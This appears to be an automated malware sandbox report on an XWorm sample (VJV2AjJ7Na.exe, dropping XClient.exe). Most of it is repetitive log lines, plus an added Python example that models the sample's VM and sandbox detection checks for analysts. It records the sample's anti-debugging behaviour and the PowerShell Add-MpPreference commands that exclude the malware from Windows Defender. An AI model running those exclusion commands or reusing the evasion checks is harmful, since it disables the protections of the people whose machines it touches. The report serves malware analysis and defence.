                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          Source: global traffic ; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1  Host: ip-api.com  Connection: Keep-Alive
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe ; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                          Source: VJV2AjJ7Na.exe, XClient.exe.0.drBinary or memory string: SBIEDLL.DLL[KQVEAADJV2MDE4GHAGXTU8C321XVZSDZIXNFTLGE1AZKK[AENBARYRKLIUZXZOTIZ5BPCJQ1K1XMK9EEIDHICQBAC00[YTHAYU1Q6YFATK6OJXZM2MXWARFUJS9TQLK6GGMSGCC9R[LR3DU7BVU63TBHQOHKWQPTFDDI7NP1NNLX5X1IYWOG9OC[DJDW2DRXRVHHOUNEOTJ0OYQM8KFYSO5RX1VQ8GARTRALO[QPKFAJ97Y9Z1MOMYBXXBJFBPXBZI35QEWQSULAGX5BPNB[IZXC0HM5MUSNBUW6NMLWQZUEYKSEQCPSHPRV8DBHLG82H[O5Q21X0I7WNGFNU6IZNKFM6BDSCAB063JZOAMXNQSASWS[5C2Z3QQ79A0C6CGAZ3AGODUEZTSGHY94BNWIFGEZK52U8[EBVRUTYO3TU6XFRYSOUTMNJ5UAESUS02HXU4XZPYIGMGE[N2F7YY7JZINY8RVVSNURHMNDZIVI8UZOIWFBNFPSOR8LH[0KI0R4NUC92ZTDK4H2TZKDWWUFZVN8RANQ9ASBCJANSM5[EH4ZUSNC2A07ZPNLRVMIUSYDS7NWRVUQFBSFLEEKOMU97[RIL69ND6IPOCBI58TFJXYX5HU70U0C6JJSX9FOFECFBQPINFO
                          Source: VJV2AjJ7Na.exe, 00000000.00000002.3360702564.00000000029A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeMemory allocated: 11E0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeMemory allocated: 1A9A0000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599891Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599782Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599657Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599532Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599407Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599282Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599157Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599047Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 598938Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 598813Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeWindow / User API: threadDelayed 8395Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeWindow / User API: threadDelayed 1445Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5152Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4697Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7556Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2058Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7349Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2200Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7713
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1962
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -599891s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -599782s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -599657s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -599532s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -599407s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -599282s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -599157s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -599047s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -598938s >= -30000sJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe TID: 3416Thread sleep time: -598813s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5948Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1476Thread sleep count: 7556 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1476Thread sleep count: 2058 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6036Thread sleep count: 7349 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6036Thread sleep count: 2200 > 30Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3708Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep count: 7713 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4080Thread sleep count: 1962 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3088Thread sleep time: -5534023222112862s >= -30000s
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599891Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599782Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599657Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599532Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599407Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599282Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599157Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 599047Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 598938Jump to behavior
                          Source: C:\Users\user\Desktop\VJV2AjJ7Na.exeThread delayed: delay time: 598813Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: XClient.exe.0.drBinary or memory string: vmware
                          Source: VJV2AjJ7Na.exe, 00000000.00000002.3391026610.000000001B7B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUU
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
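The probes above (the ip-api.com hosting lookup, the Win32_VideoController and Win32_ComputerSystem queries, the SBIEDLL.DLL and vmware strings, and the long thread delays) are the environment checks an analysis VM has to survive before this sample does anything interesting. The Python below is an added example, not code from the sample or from this report: it takes a constructed host profile and reports which of those probes would fire. The marker lists, the module list beyond SbieDll.dll, and the way results are combined are assumptions; the report shows which artifacts are inspected, not how the sample scores them.

```python
"""Evaluate the sandbox/VM probes observed in this report against a host profile.

Added example, not code from the sample or from Joe Sandbox. The report shows
*which* artifacts the sample inspects (ip-api.com 'hosting' field,
Win32_VideoController, Win32_ComputerSystem, the SbieDll.dll string, long
Thread.Sleep calls); how those results are combined below is an assumption.
"""
from dataclasses import dataclass, field
from typing import List

# Assumed: substrings a typical .NET RAT compares against WMI output (case-insensitive).
VM_MARKERS = ("vmware", "virtualbox", "vbox", "hyper-v", "qemu", "parallels")
# Assumed: DLLs injected by analysis tools; SbieDll.dll is the one the report shows.
ANALYSIS_MODULES = ("sbiedll.dll", "snxhk.dll", "cmdvrt32.dll", "api_log.dll")
# Threshold matching the report's own ">= -30000s" rule (30 s).
LONG_SLEEP_MS = 30_000


@dataclass
class HostProfile:
    ip_api_line_response: str                 # raw body of GET /line/?fields=hosting
    video_controllers: List[str]              # Win32_VideoController.Name values
    computer_system: str                      # Win32_ComputerSystem Manufacturer + Model
    loaded_modules: List[str] = field(default_factory=list)
    sleep_requests_ms: List[int] = field(default_factory=list)


def parse_ip_api_hosting(body: str) -> bool:
    """ip-api.com /line/ returns one value per line; with fields=hosting it is the
    single word 'true' or 'false'. Anything else is treated as 'not hosting', so a
    blocked or failed request does not itself make the host look like a data centre."""
    first = body.strip().splitlines()[0].strip().lower() if body.strip() else ""
    return first == "true"


def _matches_any(text: str, needles) -> bool:
    t = text.lower()
    return any(n in t for n in needles)


def evaluate(profile: HostProfile) -> List[str]:
    """Return the names of the probes that would flag this host as an analysis box."""
    fired = []
    if parse_ip_api_hosting(profile.ip_api_line_response):
        fired.append("ip-api hosting=true (data centre / colocation)")
    if any(_matches_any(n, VM_MARKERS) for n in profile.video_controllers):
        fired.append("Win32_VideoController names a hypervisor adapter")
    if _matches_any(profile.computer_system, VM_MARKERS):
        fired.append("Win32_ComputerSystem names a hypervisor")
    # Compare on the file name only; the report's string is the bare SBIEDLL.DLL.
    if any(m.lower().rsplit("\\", 1)[-1] in ANALYSIS_MODULES for m in profile.loaded_modules):
        fired.append("analysis-tool DLL loaded (e.g. SbieDll.dll)")
    if any(ms >= LONG_SLEEP_MS for ms in profile.sleep_requests_ms):
        fired.append("sleep of >= 30 s requested (timeout evasion if not skipped)")
    return fired


# Constructed sample profiles (not taken from the report).
BARE_METAL = HostProfile("false\n", ["NVIDIA GeForce RTX 3060"], "Dell Inc. OptiPlex 7090")
STOCK_SANDBOX = HostProfile(
    "true\n",
    ["VMware SVGA 3D"],
    "VMware, Inc. VMware Virtual Platform",
    loaded_modules=[r"C:\Program Files\Sandboxie\SbieDll.dll"],
    sleep_requests_ms=[600_000, 599_891],
)

if __name__ == "__main__":
    for name, p in (("bare metal", BARE_METAL), ("stock sandbox", STOCK_SANDBOX)):
        print(name, "->", evaluate(p) or ["no probe fired"])
```

Fill in a HostProfile from the image you analyse on; every entry in the returned list is something the image exposes that this family keys on. The ip-api request is also a network indicator in its own right: sinkholing it and answering anything other than `true` makes the hosting check read as a physical host.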

Anti Debugging

Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Code function: 0_2_00007FFD346972A1 CheckRemoteDebuggerPresent, 0_2_00007FFD346972A1
Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Process token adjusted: Debug (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (4 occurrences)
Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\VJV2AjJ7Na.exe' (4 occurrences)
Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' (3 occurrences)
Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'VJV2AjJ7Na.exe'
Source: C:\Users\user\Desktop\VJV2AjJ7Na.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: VJV2AjJ7Na.exe, 00000000.00000002.3360702564.000000000300A000.00000004.00000800.00020000.00000000.sdmp, VJV2AjJ7Na.exe, 00000000.00000002.3360702564.0000000002B76000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
Source: VJV2AjJ7Na.exe, 00000000.00000002.3360702564.000000000300A000.00000004.00000800.00020000.00000000.sdmp, VJV2AjJ7Na.exe, 00000000.00000002.3360702564.0000000002B76000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
